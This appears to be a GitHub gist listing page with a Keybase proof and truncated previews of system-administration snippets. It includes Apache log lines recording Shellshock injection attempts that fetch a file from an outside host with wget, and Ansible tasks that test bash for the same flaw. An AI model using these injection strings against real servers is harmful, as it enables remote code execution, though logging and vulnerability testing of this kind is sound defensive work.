I hereby claim:
- I am oneiroi on github.
- I am oneiroi (https://keybase.io/oneiroi) on keybase.
- I have a public key whose fingerprint is 1244 78DD E40C FFA1 EFB1 2F2C 22D8 7C7F A34E CF5E
To claim this, I am signing this object:
openssl s_client -cipher EXPORT -connect domain.com:443 < /dev/null 2>/dev/null | grep SSL-Session | wc -l |
#!/bin/sh -e | |
# | |
# rc.local | |
# | |
# This script is executed at the end of each multiuser runlevel. | |
# Make sure that the script will "exit 0" on success or any other | |
# value on error. | |
# | |
# In order to enable or disable this script just change the execution | |
# bits. |
import os, glob, re | |
def main(): | |
p = re.compile('^([0-9a-f]+-[0-9a-f]+)\s[a-z\-]{4}\s[0-9a-f]{8}\s[a-z0-9]{2}\:[a-z0-9]{2}\s[0-9]+\s+(.*)$') | |
smaps = glob.glob('/proc/[0-9]*/smaps') | |
for smap in smaps: | |
lines = open(smap).readlines() | |
for line in lines: | |
m = p.match(line) | |
if m and 'libc' in line: | |
name = open(smap.replace('smaps','status')).readlines()[0] |
mysql -se "SHOW STATUS LIKE 'Ssl_cipher_list'" | sed 's/:/\n/g' | sed 's/Ssl_cipher_list\s//g' | while read sspec; do SPEC=`openssl ciphers -v "$sspec" 2>/dev/null | grep -v SSLv3 | awk '{print $1}'`; [[ "$sspec" == "$SPEC" ]] && mysql --ssl-cipher=$sspec -e QUIT 2>/dev/null && echo "$sspec OK"; done |
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET / HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:11:59 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:09 +0000] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" | |
62.210.75.170 - - [29/Sep/2014:16:12:11 +0000] "GET /cgi-mod/index.cgi HTTP/1.1" 301 178 "() { :; }; wget http://creditstat.ru/b25laXJvaS5jby51a1NoZWxsU2hvY2tTYWx0 >> /dev/null" "() { :; }; wget http://creditstat.ru/b25laXJ |
- name: Ensure bash is not vulnerable CVE-2014-6271 | |
command: env x='() { :;}; echo vulnerable' bash -c "echo this is a test" | |
register: shellshock | |
failed_when: "'vulnerable' in shellshock.stdout" | |
tags: | |
- CVE | |
- CVE-2014-6271 | |
- name: Ensure bash is not vulnerable CVE-2014-7186 | |
command: bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack" |
I hereby claim:
To claim this, I am signing this object:
#!/bin/bash | |
/usr/bin/osascript <<-EOF | |
tell application "System Events" | |
activate | |
display dialog "DO STUFF NOW!" | |
end tell | |
EOF |
#!/bin/bash | |
BREW_RUBY_BIN="/usr/local/Cellar/ruby/1.9.3-p0/bin/" | |
echo "--- installing pre-requsite gems" | |
echo "rails | |
haml | |
nokogiri | |
will_paginate | |
deltacloud-client | |
simple-navigation | |
rest-client |
#!/bin/bash | |
# Author: David Busby <[email protected]> | |
### BEGIN INIT INFO | |
# Provides: edge | |
# Required-Start: $supernode | |
# Required-Stop: | |
# Default-Start: 3 5 | |
# Default-Stop: 0 1 2 6 |